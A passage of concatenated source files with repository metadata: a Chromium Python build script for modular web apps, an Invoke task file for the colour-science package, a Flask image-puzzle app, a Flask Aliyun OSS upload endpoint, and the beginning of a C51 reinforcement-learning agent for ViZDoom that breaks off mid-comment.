| permissive | bino7/chromium | 8d26f84a1b6e38a73d1b97fea6057c634eff68cb | 4666a6bb6fdcb1114afecf77bdaa239d9787b752 | refs/heads/master | 2022-12-22T14:31:53.913081 | 2016-09-06T10:05:11 | 2016-09-06T10:05:11 | 67,410,510 | 1 | 3 | BSD-3-Clause | 2022-12-17T03:08:52 | 2016-09-05T10:11:59 | null | UTF-8 | Python | false | false | 9,961 | py | #!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Release:
- Concatenates autostart modules, application modules' module.json descriptors,
and the application loader into a single script.
- Builds app.html referencing the application script.
Debug:
- Copies the module directories into their destinations.
- Copies app.html as-is.
"""
from cStringIO import StringIO
from os import path
from os.path import join
from modular_build import read_file, write_file, bail_error
import copy
import modular_build
import os
import re
import shutil
import sys
try:
import simplejson as json
except ImportError:
import json
import rjsmin
def resource_source_url(url):
return '\n/*# sourceURL=' + url + ' */'
def minify_js(javascript):
return rjsmin.jsmin(javascript)
def concatenated_module_filename(module_name, output_dir):
return join(output_dir, module_name + '/' + module_name + '_module.js')
def symlink_or_copy_file(src, dest, safe=False):
if safe and path.exists(dest):
os.remove(dest)
if hasattr(os, 'symlink'):
os.symlink(src, dest)
else:
shutil.copy(src, dest)
def symlink_or_copy_dir(src, dest):
if path.exists(dest):
shutil.rmtree(dest)
for src_dir, dirs, files in os.walk(src):
subpath = path.relpath(src_dir, src)
dest_dir = path.normpath(join(dest, subpath))
os.mkdir(dest_dir)
for name in files:
src_name = join(os.getcwd(), src_dir, name)
dest_name = join(dest_dir, name)
symlink_or_copy_file(src_name, dest_name)
class AppBuilder:
def __init__(self, application_name, descriptors, application_dir, output_dir):
self.application_name = application_name
self.descriptors = descriptors
self.application_dir = application_dir
self.output_dir = output_dir
def app_file(self, extension):
return self.application_name + '.' + extension
def core_resource_names(self):
result = []
for module in self.descriptors.sorted_modules():
if self.descriptors.application[module].get('type') != 'autostart':
continue
resources = self.descriptors.modules[module].get('resources')
if not resources:
continue
for resource_name in resources:
result.append(path.join(module, resource_name))
return result
# Outputs:
# <app_name>.html
# <app_name>.js
# <module_name>_module.js
class ReleaseBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
self._build_app_script()
for module in filter(lambda desc: (not desc.get('type') or desc.get('type') == 'remote'), self.descriptors.application.values()):
self._concatenate_dynamic_module(module['name'])
def _build_html(self):
html_name = self.app_file('html')
output = StringIO()
with open(join(self.application_dir, html_name), 'r') as app_input_html:
for line in app_input_html:
if '<script ' in line or '<link ' in line:
continue
if '</head>' in line:
output.write(self._generate_include_tag(self.app_file('js')))
output.write(line)
write_file(join(self.output_dir, html_name), output.getvalue())
output.close()
def _build_app_script(self):
script_name = self.app_file('js')
output = StringIO()
self._concatenate_application_script(output)
write_file(join(self.output_dir, script_name), minify_js(output.getvalue()))
output.close()
def _generate_include_tag(self, resource_path):
if (resource_path.endswith('.js')):
return ' <script type="text/javascript" src="%s"></script>\n' % resource_path
else:
assert resource_path
def _release_module_descriptors(self):
module_descriptors = self.descriptors.modules
result = []
for name in module_descriptors:
module = copy.copy(module_descriptors[name])
module_type = self.descriptors.application[name].get('type')
# Clear scripts, as they are not used at runtime
# (only the fact of their presence is important).
resources = module.get('resources', None)
if module.get('scripts') or resources:
if module_type == 'autostart':
# Autostart modules are already baked in.
del module['scripts']
else:
# Non-autostart modules are vulcanized.
module['scripts'] = [name + '_module.js']
# Resources are already baked into scripts.
if resources is not None:
del module['resources']
result.append(module)
return json.dumps(result)
def _write_module_resources(self, resource_names, output):
for resource_name in resource_names:
resource_name = path.normpath(resource_name).replace('\\', '/')
output.write('Runtime.cachedResources["%s"] = "' % resource_name)
resource_content = read_file(path.join(self.application_dir, resource_name)) + resource_source_url(resource_name)
resource_content = resource_content.replace('\\', '\\\\')
resource_content = resource_content.replace('\n', '\\n')
resource_content = resource_content.replace('"', '\\"')
output.write(resource_content)
output.write('";\n')
def _concatenate_autostart_modules(self, output):
non_autostart = set()
sorted_module_names = self.descriptors.sorted_modules()
for name in sorted_module_names:
desc = self.descriptors.modules[name]
name = desc['name']
type = self.descriptors.application[name].get('type')
if type == 'autostart':
deps = set(desc.get('dependencies', []))
non_autostart_deps = deps & non_autostart
if len(non_autostart_deps):
bail_error('Non-autostart dependencies specified for the autostarted module "%s": %s' % (name, non_autostart_deps))
output.write('\n/* Module %s */\n' % name)
modular_build.concatenate_scripts(desc.get('scripts'), join(self.application_dir, name), self.output_dir, output)
else:
non_autostart.add(name)
def _concatenate_application_script(self, output):
runtime_contents = read_file(join(self.application_dir, 'Runtime.js'))
runtime_contents = re.sub('var allDescriptors = \[\];', 'var allDescriptors = %s;' % self._release_module_descriptors().replace('\\', '\\\\'), runtime_contents, 1)
output.write('/* Runtime.js */\n')
output.write(runtime_contents)
output.write('\n/* Autostart modules */\n')
self._concatenate_autostart_modules(output)
output.write('/* Application descriptor %s */\n' % self.app_file('json'))
output.write('applicationDescriptor = ')
output.write(self.descriptors.application_json())
output.write(';\n/* Core resources */\n')
self._write_module_resources(self.core_resource_names(), output)
output.write('\n/* Application loader */\n')
output.write(read_file(join(self.application_dir, self.app_file('js'))))
def _concatenate_dynamic_module(self, module_name):
module = self.descriptors.modules[module_name]
scripts = module.get('scripts')
resources = self.descriptors.module_resources(module_name)
module_dir = join(self.application_dir, module_name)
output = StringIO()
if scripts:
modular_build.concatenate_scripts(scripts, module_dir, self.output_dir, output)
if resources:
self._write_module_resources(resources, output)
output_file_path = concatenated_module_filename(module_name, self.output_dir)
write_file(output_file_path, minify_js(output.getvalue()))
output.close()
# Outputs:
# <app_name>.html as-is
# <app_name>.js as-is
# <module_name>/<all_files>
class DebugBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
js_name = self.app_file('js')
src_name = join(os.getcwd(), self.application_dir, js_name)
symlink_or_copy_file(src_name, join(self.output_dir, js_name), True)
for module_name in self.descriptors.modules:
module = self.descriptors.modules[module_name]
input_module_dir = join(self.application_dir, module_name)
output_module_dir = join(self.output_dir, module_name)
symlink_or_copy_dir(input_module_dir, output_module_dir)
def _build_html(self):
html_name = self.app_file('html')
symlink_or_copy_file(join(os.getcwd(), self.application_dir, html_name), join(self.output_dir, html_name), True)
def build_application(application_name, loader, application_dir, output_dir, release_mode):
descriptors = loader.load_application(application_name + '.json')
if release_mode:
builder = ReleaseBuilder(application_name, descriptors, application_dir, output_dir)
else:
builder = DebugBuilder(application_name, descriptors, application_dir, output_dir)
builder.build_app()
| [
"[email protected]"
]
| |
3aea4843be237c4dcdce35ea871082ef159c6872 | b9029f7e08bb93c435290e9e01dba3507714bafc | /tasks.py | a64b8ddab455bd356781035556f67836cb43532a | [
"BSD-3-Clause"
]
| permissive | njwardhan/colour | 3a4bf7994e25f02e15aa16bc03d35d7f6cc61a50 | 60679360c3990bc549b5f947bfeb621383e18b5e | refs/heads/master | 2022-09-29T06:17:36.380542 | 2020-01-25T05:10:15 | 2020-01-25T05:10:15 | 253,715,920 | 0 | 0 | null | 2020-04-07T07:14:32 | 2020-04-07T07:14:31 | null | UTF-8 | Python | false | false | 13,629 | py | # -*- coding: utf-8 -*-
"""
Invoke - Tasks
==============
"""
from __future__ import unicode_literals
import sys
try:
import biblib.bib
except ImportError:
pass
import fnmatch
import os
import re
import toml
import uuid
from invoke import task
import colour
from colour.utilities import message_box
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = [
'APPLICATION_NAME', 'APPLICATION_VERSION', 'PYTHON_PACKAGE_NAME',
'PYPI_PACKAGE_NAME', 'BIBLIOGRAPHY_NAME', 'clean', 'formatting', 'tests',
'quality', 'examples', 'preflight', 'docs', 'todo', 'requirements',
'build', 'virtualise', 'tag', 'release', 'sha256'
]
APPLICATION_NAME = colour.__application_name__
APPLICATION_VERSION = colour.__version__
PYTHON_PACKAGE_NAME = colour.__name__
PYPI_PACKAGE_NAME = 'colour-science'
BIBLIOGRAPHY_NAME = 'BIBLIOGRAPHY.bib'
@task
def clean(ctx, docs=True, bytecode=False):
"""
Cleans the project.
Parameters
----------
ctx : invoke.context.Context
Context.
docs : bool, optional
Whether to clean the *docs* directory.
bytecode : bool, optional
Whether to clean the bytecode files, e.g. *.pyc* files.
Returns
-------
bool
Task success.
"""
message_box('Cleaning project...')
patterns = ['build', '*.egg-info', 'dist']
if docs:
patterns.append('docs/_build')
patterns.append('docs/generated')
if bytecode:
patterns.append('**/*.pyc')
for pattern in patterns:
ctx.run("rm -rf {}".format(pattern))
@task
def formatting(ctx, yapf=False, asciify=True, bibtex=True):
"""
Formats the codebase with *Yapf*, converts unicode characters to ASCII and
cleanup the "BibTeX" file.
Parameters
----------
ctx : invoke.context.Context
Context.
yapf : bool, optional
Whether to format the codebase with *Yapf*.
asciify : bool, optional
Whether to convert unicode characters to ASCII.
bibtex : bool, optional
Whether to cleanup the *BibTeX* file.
Returns
-------
bool
Task success.
"""
if yapf:
message_box('Formatting codebase with "Yapf"...')
ctx.run('yapf -p -i -r --exclude \'.git\' .')
if asciify:
message_box('Converting unicode characters to ASCII...')
with ctx.cd('utilities'):
ctx.run('./unicode_to_ascii.py')
if bibtex and sys.version_info[:2] >= (3, 2):
message_box('Cleaning up "BibTeX" file...')
bibtex_path = BIBLIOGRAPHY_NAME
with open(bibtex_path) as bibtex_file:
bibtex = biblib.bib.Parser().parse(
bibtex_file.read()).get_entries()
for entry in sorted(bibtex.values(), key=lambda x: x.key):
try:
del entry['file']
except KeyError:
pass
for key, value in entry.items():
entry[key] = re.sub('(?<!\\\\)\\&', '\\&', value)
with open(bibtex_path, 'w') as bibtex_file:
for entry in bibtex.values():
bibtex_file.write(entry.to_bib())
bibtex_file.write('\n')
@task
def tests(ctx, nose=True):
"""
Runs the unit tests with *Nose* or *Pytest*.
Parameters
----------
ctx : invoke.context.Context
Context.
nose : bool, optional
Whether to use *Nose* or *Pytest*.
Returns
-------
bool
Task success.
"""
if nose:
message_box('Running "Nosetests"...')
ctx.run(
'nosetests --with-doctest --with-coverage --cover-package={0} {0}'.
format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
else:
message_box('Running "Pytest"...')
ctx.run(
'py.test --disable-warnings --doctest-modules '
'--ignore={0}/examples {0}'.format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
@task
def quality(ctx, flake8=True, rstlint=True):
"""
Checks the codebase with *Flake8* and lints various *restructuredText*
files with *rst-lint*.
Parameters
----------
ctx : invoke.context.Context
Context.
flake8 : bool, optional
Whether to check the codebase with *Flake8*.
rstlint : bool, optional
Whether to lint various *restructuredText* files with *rst-lint*.
Returns
-------
bool
Task success.
"""
if flake8:
message_box('Checking codebase with "Flake8"...')
ctx.run('flake8 {0} --exclude=examples'.format(PYTHON_PACKAGE_NAME))
if rstlint:
message_box('Linting "README.rst" file...')
ctx.run('rst-lint README.rst')
@task
def examples(ctx, plots=False):
"""
Runs the examples.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to skip or only run the plotting examples: This a mutually
exclusive switch.
Returns
-------
bool
Task success.
"""
message_box('Running examples...')
for root, _dirnames, filenames in os.walk(
os.path.join(PYTHON_PACKAGE_NAME, 'examples')):
for filename in fnmatch.filter(filenames, '*.py'):
if not plots and ('plotting' in root or
'examples_interpolation' in filename or
'examples_contrast' in filename):
continue
if plots and ('plotting' not in root and
'examples_interpolation' not in filename and
'examples_contrast' not in filename):
continue
ctx.run('python {0}'.format(os.path.join(root, filename)))
@task(formatting, tests, quality, examples)
def preflight(ctx):
"""
Performs the preflight tasks, i.e. *formatting*, *tests*, *quality*, and
*examples*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Finishing "Preflight"...')
@task
def docs(ctx, plots=True, html=True, pdf=True):
"""
Builds the documentation.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to generate the documentation plots.
html : bool, optional
Whether to build the *HTML* documentation.
pdf : bool, optional
Whether to build the *PDF* documentation.
Returns
-------
bool
Task success.
"""
if plots:
with ctx.cd('utilities'):
message_box('Generating plots...')
ctx.run('./generate_plots.py')
with ctx.prefix('export COLOUR_SCIENCE_DOCUMENTATION_BUILD=True'):
with ctx.cd('docs'):
if html:
message_box('Building "HTML" documentation...')
ctx.run('make html')
if pdf:
message_box('Building "PDF" documentation...')
ctx.run('make latexpdf')
@task
def todo(ctx):
"""
Export the TODO items.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "TODO" items...')
with ctx.cd('utilities'):
ctx.run('./export_todo.py')
@task
def requirements(ctx):
"""
Export the *requirements.txt* file.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "requirements.txt" file...')
ctx.run('poetry run pip freeze | '
'egrep -v "github.com/colour-science|enum34" '
'> requirements.txt')
@task(clean, preflight, docs, todo, requirements)
def build(ctx):
"""
Builds the project and runs dependency tasks, i.e. *docs*, *todo*, and
*preflight*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Building...')
pyproject_content = toml.load('pyproject.toml')
pyproject_content['tool']['poetry']['name'] = PYPI_PACKAGE_NAME
pyproject_content['tool']['poetry']['packages'] = [{
'include': PYTHON_PACKAGE_NAME,
'from': '.'
}]
with open('pyproject.toml', 'w') as pyproject_file:
toml.dump(pyproject_content, pyproject_file)
ctx.run('poetry build')
ctx.run('git checkout -- pyproject.toml')
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('cp {0}-{1}/setup.py ../'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('rm -rf {0}-{1}'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
with open('setup.py') as setup_file:
source = setup_file.read()
setup_kwargs = []
def sub_callable(match):
setup_kwargs.append(match)
return ''
template = """
setup({0}
)
"""
source = re.sub(
'setup_kwargs = {(.*)}.*setup\\(\\*\\*setup_kwargs\\)',
sub_callable,
source,
flags=re.DOTALL)[:-2]
setup_kwargs = setup_kwargs[0].group(1).splitlines()
for i, line in enumerate(setup_kwargs):
setup_kwargs[i] = re.sub('^\\s*(\'(\\w+)\':\\s?)', ' \\2=', line)
if setup_kwargs[i].strip().startswith('long_description'):
setup_kwargs[i] = (
' long_description=open(\'README.rst\').read(),')
source += template.format('\n'.join(setup_kwargs))
with open('setup.py', 'w') as setup_file:
setup_file.write(source)
@task
def virtualise(ctx, tests=True):
"""
Create a virtual environment for the project build.
Parameters
----------
ctx : invoke.context.Context
Context.
tests : bool, optional
Whether to run tests on the virtual environment.
Returns
-------
bool
Task success.
"""
unique_name = '{0}-{1}'.format(PYPI_PACKAGE_NAME, uuid.uuid1())
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('mv {0}-{1} {2}'.format(PYPI_PACKAGE_NAME, APPLICATION_VERSION,
unique_name))
with ctx.cd(unique_name):
ctx.run('poetry env use 3')
ctx.run('poetry install --extras "optional plotting"')
ctx.run('source $(poetry env info -p)/bin/activate')
ctx.run('python -c "import imageio;'
'imageio.plugins.freeimage.download()"')
if tests:
ctx.run('poetry run nosetests', env={'MPLBACKEND': 'AGG'})
@task
def tag(ctx):
"""
Tags the repository according to defined version using *git-flow*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Tagging...')
result = ctx.run('git rev-parse --abbrev-ref HEAD', hide='both')
assert result.stdout.strip() == 'develop', (
'Are you still on a feature or master branch?')
with open(os.path.join(PYTHON_PACKAGE_NAME, '__init__.py')) as file_handle:
file_content = file_handle.read()
major_version = re.search("__major_version__\\s+=\\s+'(.*)'",
file_content).group(1)
minor_version = re.search("__minor_version__\\s+=\\s+'(.*)'",
file_content).group(1)
change_version = re.search("__change_version__\\s+=\\s+'(.*)'",
file_content).group(1)
version = '.'.join((major_version, minor_version, change_version))
result = ctx.run('git ls-remote --tags upstream', hide='both')
remote_tags = result.stdout.strip().split('\n')
tags = set()
for remote_tag in remote_tags:
tags.add(
remote_tag.split('refs/tags/')[1].replace('refs/tags/', '^{}'))
tags = sorted(list(tags))
assert 'v{0}'.format(version) not in tags, (
'A "{0}" "v{1}" tag already exists in remote repository!'.format(
PYTHON_PACKAGE_NAME, version))
ctx.run('git flow release start v{0}'.format(version))
ctx.run('git flow release finish v{0}'.format(version))
@task(clean, build)
def release(ctx):
"""
Releases the project to *Pypi* with *Twine*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Releasing...')
with ctx.cd('dist'):
ctx.run('twine upload *.tar.gz')
ctx.run('twine upload *.whl')
@task
def sha256(ctx):
"""
Computes the project *Pypi* package *sha256* with *OpenSSL*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Computing "sha256"...')
with ctx.cd('dist'):
ctx.run('openssl sha256 {0}-*.tar.gz'.format(PYPI_PACKAGE_NAME))
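# Typical usage via the Invoke CLI (task names follow the functions above):
#   invoke clean
#   invoke preflight
#   invoke build
#   invoke release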
| [
"[email protected]"
]
| |
b7e02524df176839009c27ff8e612e57db07bef9 | 13f03eb35aeb306e0a33d67437993f849d5b0e8d | /CS110 Intro to Python/Project 2/project2 no extra credit.py | da45097dc3486773e6bfa601825fd80804437b4e | []
| no_license | jalague/Projects | cee07f49e41a33e9529317b6beace2bb7b56e1c6 | 5e1a15cdf10ff8f878474011a04868b15334aad5 | refs/heads/master | 2021-01-12T08:28:13.707957 | 2019-12-03T01:23:32 | 2019-12-03T01:23:32 | 76,586,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,488 | py | import flask
import PIL
from flask import request
from flask import redirect
from imageHelperFunctions import *
import os, os.path
app=flask.Flask(__name__)
def editImage(option,filename,newname):
im=openImageFile(filename)
w,h=size(im)
for i in range(0,h):
for j in range(0,w):
r,g,b= getPixel((j,i),im)
if option==1:
setPixel((j,i),im, (r*20,0,0))
elif option==2:
setPixel((j,i),im, (0,g*20,0))
elif option==3:
setPixel((j,i),im, (0,0,b*20))
#showImage(im)
saveImageFile(im,newname,"PNG")
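    # Example: with option 1 a pixel (10, 200, 30) becomes (200, 0, 0) --
    # the red channel is scaled by 20 and the other two channels are zeroed.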
@app.route('/')
def displayPuzzle():
print("In displayPuzzle")
if not os.path.exists('static/newimage1.png'):
editImage(1,"static/distortedImage1.png", "static/newimage1.png")
if not os.path.exists('static/newimage2.png'):
editImage(2,"static/distortedImage1.png", "static/newimage2.png")
if not os.path.exists('static/newimage3.png'):
editImage(3,"static/distortedImage1.png", "static/newimage3.png")
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
html+=" <h1>Image Puzzle</h1>\n"
html+=' <p1> Apply one of the operations below to the image, and see if you can guess what famous object is in the image! </p1>\n'
html+='<img src="/static/distortedImage1.png" alt="distortedImage1"style="width:1024px;height:683px" >\n'
html+='<br>\n'
html+='Pick an Operation:<br>\n'
html+='<form method="POST" action="/showimage">\n'
    html+='<input type="radio" name="operation" value="red">Set blue and green pixels to 0 and multiply red ones by 20<br>\n'
    html+='<input type="radio" name="operation" value="green">Set blue and red pixels to 0 and multiply green ones by 20<br>\n'
    html+='<input type="radio" name="operation" value="blue">Set red and green pixels to 0 and multiply blue ones by 20<br>\n'
html+='<input type="submit" value="Apply Operations" />\n'
    html+='</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/showimage", methods=['POST'])
def showEditedimage():
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
operation=request.form["operation"]
if operation=="red":
html+='<img src="/static/newimage1.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="green":
html+='<img src="/static/newimage2.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="blue":
html+='<img src="/static/newimage3.png" alt="newimage" style="width:1024px;height:683px" >\n'
html+='<br>\n'
html += '<form method="POST" action="/guessImage">\n'
html += 'Enter your guess <input type="text" name="guess"/>\n'
    html += '</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/guessImage", methods=['POST'])
def guessImage():
guess=request.form["guess"]
if guess=="White House" or guess=="white house" or guess=="the white house" or guess=="The White House" or guess=="the White House":
return "Correct!"
else:
return redirect('/')
if __name__ == '__main__':
app.run()
| [
"[email protected]"
]
| |
ce17d3e628bbb39aa428a1fe21da1b9f4d08ce1d | 9f3365f168dc94f8009f6586a58dc536b2af6921 | /controller/oss.py | 9a8cb7996f6e745ce6d81f7397212f9de6da0a71 | []
| no_license | qmaxlambda/backend | 80d9ad8999431c4357e5a20e110c250f8809552e | 6f2a8ad9daff03499699d146015dc9f15a7f5448 | refs/heads/master | 2023-01-23T05:54:41.503490 | 2020-12-11T03:57:28 | 2020-12-11T03:57:28 | 311,026,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | # -*- coding: utf-8 -*-
# @Time : 2020/11/8 下午 04:59
# @Author : Mason
# @Email : [email protected]
# @File : oss.py
# @Software: PyCharm
import json
import os
import oss2
from flask import request, Blueprint
from Config import config
from util.jsons import js_ret
oss_bp = Blueprint('oss',__name__)
access_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', config.ACCESSKEY_ID)
access_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', config.ACCESSKEY_SCRECT)
bucket_name = os.getenv('OSS_TEST_BUCKET', config.BUCKET_NAME)
endpoint = os.getenv('OSS_TEST_ENDPOINT', config.ENDPOINT)
# Verify the parameters are set
for param in (access_key_id, access_key_secret, bucket_name, endpoint):
    assert '<' not in param, 'Please set the parameter: ' + param
# Create the Bucket object
bucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)
@oss_bp.route('/update', methods=["GET", "POST"])
def update():
    # Get the file uploaded to the server
    file = request.files.get('file')
    if file is None:
        return js_ret(0, 'no file found in the request')
    else:
        # Upload the file to Aliyun OSS
        res = bucket.put_object(file.filename, file)
        if res.status == 200:
            # Upload succeeded: get a signed URL for the file and return it to the frontend
            url = bucket.sign_url('GET', file.filename, 60)
            data = {
                "url": url
            }
            return js_ret(1, "", data)
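# Usage sketch (assumed host/port and URL prefix -- adjust to how oss_bp is
# registered on the Flask app):
#   curl -F "file=@photo.jpg" http://localhost:5000/update
# A successful response carries a signed GET URL that is valid for 60 seconds.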
| [
"[email protected]"
]
| |
140b356fa408e4eb413cb2c100895ff01e14c112 | 264cbdc7c2b4091179ba5fbdbb15005f6ac58b9f | /Algos/C51/examples/python/c51_ddqn.py | bb6455d9b4ae5b306ac48462cd633e024bd33c62 | []
| no_license | geeko66/PA2018-2019-KA | e25b49dd71ad4b5b2f3a00624147a9b24151c3d8 | 186d127608c8ea754a6e64836b0347d32cf37da6 | refs/heads/master | 2020-04-15T21:46:42.503444 | 2019-01-16T11:12:12 | 2019-01-16T11:12:12 | 165,046,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,185 | py | #!/usr/bin/env python
from __future__ import print_function
import skimage as skimage
from skimage import transform, color, exposure
from skimage.viewer import ImageViewer
import random
from random import choice
import numpy as np
from collections import deque
import time
import math
import pickle
import json
from keras.models import model_from_json
from keras.models import Sequential, load_model, Model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, Dense, Flatten, merge, MaxPooling2D, Input, AveragePooling2D, Lambda, Merge, Activation, Embedding
from keras.optimizers import SGD, Adam, rmsprop
from keras import backend as K
from keras.utils import np_utils
from vizdoom import DoomGame, ScreenResolution
from vizdoom import *
import itertools as it
from time import sleep
import tensorflow as tf
from networks import Networks
import sys
# Not needed for the Bonseyes project
def preprocessImg(img, size):
img = np.rollaxis(img, 0, 3) # It becomes (640, 480, 3)
img = skimage.transform.resize(img,size)
img = skimage.color.rgb2gray(img)
return img
class C51Agent:
def __init__(self, state_size, action_size, num_atoms):
# get size of state and action
self.state_size = state_size
self.action_size = action_size
# these is hyper parameters for the DQN
self.gamma = 0.99
self.learning_rate = 0.0001
self.epsilon = 1.0
self.initial_epsilon = 1.0
self.final_epsilon = 0.0001
self.batch_size = 32
self.observe = 2000
self.explore = 50000
self.frame_per_action = 4
self.update_target_freq = 3000
self.timestep_per_train = 100 # Number of timesteps between training interval
# Initialize Atoms
self.num_atoms = num_atoms # 51 for C51
self.v_max = 30 # Max possible score for Defend the center is 26 - 0.1*26 = 23.4
self.v_min = -10 # -0.1*26 - 1 = -3.6
self.delta_z = (self.v_max - self.v_min) / float(self.num_atoms - 1)
self.z = [self.v_min + i * self.delta_z for i in range(self.num_atoms)]
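        # Worked example with the defaults above: num_atoms = 51, v_min = -10,
        # v_max = 30 give delta_z = 40 / 50 = 0.8, so the support is
        # z = [-10.0, -9.2, -8.4, ..., 29.2, 30.0] (51 evenly spaced atoms).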
# Create replay memory using deque
self.memory = deque()
self.max_memory = 50000 # number of previous transitions to remember
# Models for value distribution
self.model = None
self.target_model = None
# Performance Statistics
        self.stats_window_size = 50  # window size for computing rolling statistics
self.mavg_score = [] # Moving Average of Survival Time
self.var_score = [] # Variance of Survival Time
self.mavg_ammo_left = [] # Moving Average of Ammo used
self.mavg_kill_counts = [] # Moving Average of Kill Counts
def update_target_model(self):
"""
After some time interval update the target model to be same with model
"""
self.target_model.set_weights(self.model.get_weights())
def get_action(self, state):
"""
Get action from model using epsilon-greedy policy
"""
if np.random.rand() <= self.epsilon:
#print("----------Random Action----------")
action_idx = random.randrange(self.action_size)
else:
action_idx = self.get_optimal_action(state)
return action_idx
def get_optimal_action(self, state):
"""Get optimal action for a state
"""
z = self.model.predict(state) # Return a list [1x51, 1x51, 1x51]
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1)
# Pick action with the biggest Q value
action_idx = np.argmax(q)
return action_idx
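    # Note on the Q computation above: each action's Q value is the expectation
    # of its return distribution, Q(s, a) = sum_i z_i * p_i(s, a). For example,
    # a uniform distribution (p_i = 1/51) over the support [-10, ..., 30]
    # yields Q = 10, the mean of the support.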
def shape_reward(self, r_t, misc, prev_misc, t):
"""
Reward design:
        Will be the inverted time in Bonseyes (x = -x), because
        time is the thing we want to minimize; therefore we
        maximize the inverted time.
"""
# Check any kill count
if misc[0] > prev_misc[0]:
r_t = r_t + 1
if misc[1] < prev_misc[1]: # Use ammo
r_t = r_t - 0.1
if misc[2] < prev_misc[2]: # Loss HEALTH
r_t = r_t - 0.1
return r_t
# save sample <s,a,r,s'> to the replay memory
def replay_memory(self, s_t, action_idx, r_t, s_t1, is_terminated, t):
"""
Used for the replay experience
"""
self.memory.append((s_t, action_idx, r_t, s_t1, is_terminated))
if self.epsilon > self.final_epsilon and t > self.observe:
self.epsilon -= (self.initial_epsilon - self.final_epsilon) / self.explore
if len(self.memory) > self.max_memory:
self.memory.popleft()
# Update the target model to be same with model
if t % self.update_target_freq == 0:
self.update_target_model()
# pick samples randomly from replay memory (with batch_size)
def train_replay(self):
"""
Notes: Update this part to prioritize the experience replay
following the other code. To see!!!
"""
num_samples = min(self.batch_size * self.timestep_per_train, len(self.memory))
replay_samples = random.sample(self.memory, num_samples)
state_inputs = np.zeros(((num_samples,) + self.state_size))
next_states = np.zeros(((num_samples,) + self.state_size))
        m_prob = [np.zeros((num_samples, self.num_atoms)) for i in range(self.action_size)]
action, reward, done = [], [], []
for i in range(num_samples):
state_inputs[i,:,:,:] = replay_samples[i][0]
action.append(replay_samples[i][1])
reward.append(replay_samples[i][2])
next_states[i,:,:,:] = replay_samples[i][3]
done.append(replay_samples[i][4])
z = self.model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
z_ = self.target_model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
# Get Optimal Actions for the next states (from distribution z)
optimal_action_idxs = []
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) # length (num_atoms x num_actions)
        q = q.reshape((num_samples, self.action_size), order='F')
optimal_action_idxs = np.argmax(q, axis=1)
# Project Next State Value Distribution (of optimal action) to Current State
for i in range(num_samples):
if done[i]: # Terminal State
# Distribution collapses to a single point
Tz = min(self.v_max, max(self.v_min, reward[i]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += (m_u - bj)
m_prob[action[i]][i][int(m_u)] += (bj - m_l)
else:
for j in range(self.num_atoms):
Tz = min(self.v_max, max(self.v_min, reward[i] + self.gamma * self.z[j]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += z_[optimal_action_idxs[i]][i][j] * (m_u - bj)
m_prob[action[i]][i][int(m_u)] += z_[optimal_action_idxs[i]][i][j] * (bj - m_l)
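        # Worked projection example: reward = 1, gamma = 0.99 and atom z_j = 10
        # give Tz = 1 + 0.99 * 10 = 10.9 and bj = (10.9 + 10) / 0.8 = 26.125,
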